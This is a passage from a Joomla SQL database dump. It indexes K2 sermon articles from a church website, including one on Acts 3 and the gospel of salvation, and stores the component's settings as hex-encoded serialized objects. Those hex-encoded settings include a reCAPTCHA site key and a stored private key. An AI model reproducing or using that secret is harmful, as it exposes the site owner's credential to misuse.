af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223133223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a36313a2232353a7468652d706f736974696f6e2d746861742d612d63687269737469616e2d6d7573742d74616b652d696e2d74686573652d6c6173742d64617973223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a37393a22636f6d706f6e656e742f6b322f6974656d2f32352d7468652d706f736974696f6e2d746861742d612d63687269737469616e2d6d7573742d74616b652d696e2d74686573652d6c6173742d64617973223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3235223b733a353a22726f757465223b733a39383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32353a7468652d706f736974696f6e2d746861742d612d63687269737469616e2d6d7573742d74616b652d696e2d74686573652d6c6173742d64617973223b733a353a227469746c65223b733a35383a2254686520506f736974696f6e207468617420612043687269737469616e206d7573742074616b6520496e207468657365206c6173742064617973223b733a31313a226465736372697074696f6e223b733a3531323a222052657620333a372d32322c204d61726b2032343a20332c342c2031302d3132205468652043687269737469616e7320696e205068696c6164656c70686961203a205468652043687269737469616e7320696e205068696c6164656c7068696120617265206578616d706c6520747275652043687269737469616e732077686f207374616e6420666f7220476f64e280997320776f726420616e6420486973206e616d6520696e207468657365206c61737420646179732e205468657920617265207361696420746f206861766520737472656e6774682c2074686579206b6570742074686520776f7264206f6620476f6420616e6420746865726520776173206e6f7468696e67207468617420636f756c642074616b6520746865206e616d65206f66204a657375732066726f6d207468656972206d6f7574682e20476f64e280997320537472656e6774682c2074686520576f7264206f6620476f6420616e6420746865204e616d65206f66204a6573757320617265207468726565206d616a6f72207468696e677320746861742074686520646576696c206861732073746f6c656e2066726f6d2043687269737469616e73e28099206c6976657320746f6461792e20416e6420686520686173207475726e6564207365766572616c20636875726368657320746f2073796e61676f677565206f6620536174616e2e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d31392031393a30343a3138223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d31392031393a30343a3138223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(244, 'index.php?option=com_k2&view=item&id=28', 'index.php?option=com_k2&view=item&id=28:salvation', 'Critical Points in the Gospel of Salvation', ' Text: Acts 3:17 – end. And now, brethren, I wot that through ignorance ye did it, as did also your rulers. 18 But those things, which God before had shewed by the mouth of all his prophets, that Christ should suffer, he hath so fulfilled. 19 Repent ye therefore, and be converted, that your sins may be blotted out, when the times of refreshing shall come from the presence of the Lord; ', '2017-06-25 14:18:32', 'c5145fa262936012395726999fdae8f4', 1, 1, 1, '*', '2017-03-04 22:36:16', '0000-00-00 00:00:00', '2017-03-04 22:36:16', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223238223b733a353a22616c696173223b733a393a2273616c766174696f6e223b733a373a2273756d6d617279223b733a3432393a223c703e546578743a204163747320333a313720e2809320656e642e3c2f703e0d0a3c703ec2a0416e64206e6f772c20627265746872656e2c204920776f742074686174207468726f7567682069676e6f72616e6365207965206469642069742c2061732064696420616c736f20796f75722072756c6572732e3c2f703e0d0a3c703ec2a0313820c2a04275742074686f7365207468696e67732c20776869636820476f64206265666f7265206861642073686577656420627920746865206d6f757468206f6620616c6c206869732070726f70686574732c2074686174204368726973742073686f756c64207375666665722c206865206861746820736f2066756c66696c6c65642e3c2f703e0d0a3c703e313920c2a0526570656e74207965207468657265666f72652c20616e6420626520636f6e7665727465642c207468617420796f75722073696e73206d617920626520626c6f74746564206f75742c207768656e207468652074696d6573206f662072656672657368696e67207368616c6c20636f6d652066726f6d207468652070726573656e6365206f6620746865204c6f72643b3c2f703e0d0a223b733a343a22626f6479223b733a323636353a220d0a3c703e323020c2a0416e64206865207368616c6c2073656e64204a65737573204368726973742c207768696368206265666f72652077617320707265616368656420756e746f20796f753a3c2f703e0d0a3c703e323120c2a057686f6d207468652068656176656e206d757374207265636569766520756e74696c207468652074696d6573206f66207265737469747574696f6e206f6620616c6c207468696e67732c20776869636820476f6420686174682073706f6b656e20627920746865206d6f757468206f6620616c6c2068697320686f6c792070726f70686574732073696e63652074686520776f726c6420626567616e2e3c2f703e0d0a3c703e323220c2a0466f72204d6f736573207472756c79207361696420756e746f2074686520666174686572732c20412070726f70686574207368616c6c20746865204c6f726420796f757220476f6420726169736520757020756e746f20796f75206f6620796f757220627265746872656e2c206c696b6520756e746f206d653b2068696d207368616c6c207965206865617220696e20616c6c207468696e67732077686174736f65766572206865207368616c6c2073617920756e746f20796f752e3c2f703e0d0a3c703e323320c2a0416e64206974207368616c6c20636f6d6520746f20706173732c207468617420657665727920736f756c2c2077686963682077696c6c206e6f74206865617220746861742070726f706865742c207368616c6c2062652064657374726f7965642066726f6d20616d6f6e67207468652070656f706c652e3c2f703e0d0a3c703e323420c2a05965612c20616e6420616c6c207468652070726f70686574732066726f6d2053616d75656c20616e642074686f7365207468617420666f6c6c6f772061667465722c206173206d616e7920617320686176652073706f6b656e2c2068617665206c696b657769736520666f7265746f6c64206f6620746865736520646179732e3c2f703e0d0a3c703e323520c2a059652061726520746865206368696c6472656e206f66207468652070726f70686574732c20616e64206f662074686520636f76656e616e7420776869636820476f64206d6164652077697468206f757220666174686572732c20736179696e6720756e746f204162726168616d2c20416e6420696e207468792073656564207368616c6c20616c6c20746865206b696e6472656473206f662074686520656172746820626520626c65737365642e3c2f703e0d0a3c703e323620c2a0556e746f20796f7520666972737420476f642c20686176696e67207261697365642075702068697320536f6e204a657375732c2073656e742068696d20746f20626c65737320796f752c20696e207475726e696e672061776179206576657279206f6e65206f6620796f752066726f6d2068697320696e69717569746965732e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e3c7374726f6e673e496e74726f64756374696f6e3a3c2f7374726f6e673e20546f6461792077652077696c6c206d6f7665206f6e20746f207365652074686520637269746963616c20706f696e747320696e2074686520676f7370656c206f662073616c766174696f6e2e3c2f703e0d0a3c703e496e20617474656d7074696e6720746f206c65616420736f756c7320746f204368726973742c20796f75206d757374206b6e6f77207768617420746f2074656c6c207468652073696e6e65722c207468652074727574687320746f20736861726520746861742077696c6c20746f7563682074686569722068656172747320666f72204a657375732e3c2f703e0d0a3c703e54686520466f6c6c6f77696e6720506f696e74732041726520476f6f64204275742057696c6c204e6f742053617665205468652053696e6e65723a3c2f703e0d0a3c6f6c3e0d0a3c6c693e53746f7020736d6f6b696e672063696761726574746573206f7220776f6d616e697a696e67206f72206368656174696e672e3c2f6c693e0d0a3c6c693e436f6d6520746f206f757220636875726368206e657874207765656b2053756e6461792e3c2f6c693e0d0a3c6c693e4d7920706173746f722063616e207072617920666f7220796f7520616e6420796f75722070726f626c656d2077696c6c20676f206574632e3c2f6c693e0d0a3c2f6f6c3e0d0a3c703e5768656e20796f752068617665207468652070726976696c656765206f66206d696e6973746572696e6720746f2073696e6e65722c2077686174206d75737420686520626520746f6c6420616d6f6e677374206f74686572207468696e67733f3c2f703e0d0a3c703e3a3a20566572736520313720e2809320446f6ee280997420636f6e64656d6e2068696d3b2068652069732073696e6e696e6720696e2069676e6f72616e63652e20486520697320696e206461726b6e6573732e20596f7520617265206869732068656c7020696e746f20746865206c696768742e20446f6ee2809974206a756467652068696d20e280a62068656c702068696d2e3c2f703e0d0a3c703e3a3a20566572736520313820e28093204c65742068696d206b6e6f7720746861742043687269737420697320476f64e280997320706c616e20666f72206869732073616c766174696f6e2e2049662068652077617320746865206f6e6c792073696e6e65722c204a6573757320776f756c64207374696c6c206861766520636f6d6520746f2064696520746f20736176652068696d20e280a620476f64206c6f7665732068696d2074686174206d756368212053686f772068696d20476f64e2809973206c6f7665206e6f74206869732073686f7274636f6d696e67732e3c2f703e0d0a3c703e3a3a20566572736520313920e280932044656d616e6420666f7220726570656e74616e63653b206368616e6765206f662068656172742c206368616e6765206f66204c6f7264736869702c206368616e6765206f662077617973206574632e204865206d757374207377697463682066726f6d20666f6c6c6f77696e672073656c6620746f20666f6c6c6f77696e6720476f642e2054656c6c2068696d2061626f75742074686520666f72676976656e657373207468617420476f64206f6e6c792067697665732e2031204a6f686e20313a3820e280932031302e3c2f703e0d0a3c703e3a3a20566572736520323020e280932032363a2048656c702068696d20746f2074726163652068697320726f6f7473206261636b20746f20476f6420e280932077686f65766572206865206d617920626520e28093204d75736c696d2c2043656c65737469616c2c20432026616d703b20532c204f6363756c74697374e280a62068656c702068696d20746f206b6e6f7720686f7720686520697320476f64e280997320637265617475726520616e6420476f642068617320676f6e6520746f2074686520657874656e74206f66204a65737573e28099206465617468206f6e207468652063726f737320616e642074686520726573757272656374696f6e20746f206272696e672068696d206261636b20746f20476f642e3c2f703e0d0a3c703e4d617920476f642068656c7020796f7520617320796f75206c656164206d656e20746f2043687269737420696e204a65737573206e616d652e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d31322031363a35343a3536223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c